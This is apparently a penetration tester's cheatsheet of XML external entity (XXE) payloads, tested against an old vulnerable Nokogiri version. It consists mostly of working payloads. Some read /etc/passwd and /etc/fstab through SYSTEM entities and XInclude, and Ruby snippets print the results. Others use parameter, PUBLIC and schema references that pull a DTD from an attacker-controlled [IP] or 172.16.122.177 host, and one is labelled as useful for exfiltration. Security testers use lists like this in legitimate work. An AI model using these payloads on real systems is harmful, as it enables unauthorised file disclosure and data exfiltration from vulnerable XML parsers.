An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.

XML Headers:

1
2
<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

1
<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

1
2
3
4
<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>
e.g.
doc = Nokogiri::XML("<!DOCTYPE root [ <!ENTITY spl SYSTEM \"file:///etc/passwd\"> ]>\n<a>&spl;</a>")
doc.children.children.children.text

Parameter Entity Test. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

1
2
3
4
5
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>
e.g.
options = Nokogiri::XML::ParseOptions::DTDATTR
doc = Nokogiri::XML::Document.parse("<!DOCTYPE test [<!ENTITY % dtd SYSTEM \"http://172.16.122.177/student.dtd\"><!ENTITY % a "test %dtd">]>\n<test>success</test>", nil, nil, options)
doc.children.text

Combined Entity and Parameter Entity:

1
<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

XInclude:

1
2
3
<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

URL handler. This follows XML Entity - IBM I have not seen this work “in the wild”. Should be useful for exfiltration testing:

1
<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

1
2
<madeuptag xlmns="http://[ip]" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote XML Schema. Also, have not been able to get this to work:

1
<!DOCTYPE root PUBLIC "abc/Catalog" "http://[IP]/catalog.dtd">

Useful Links: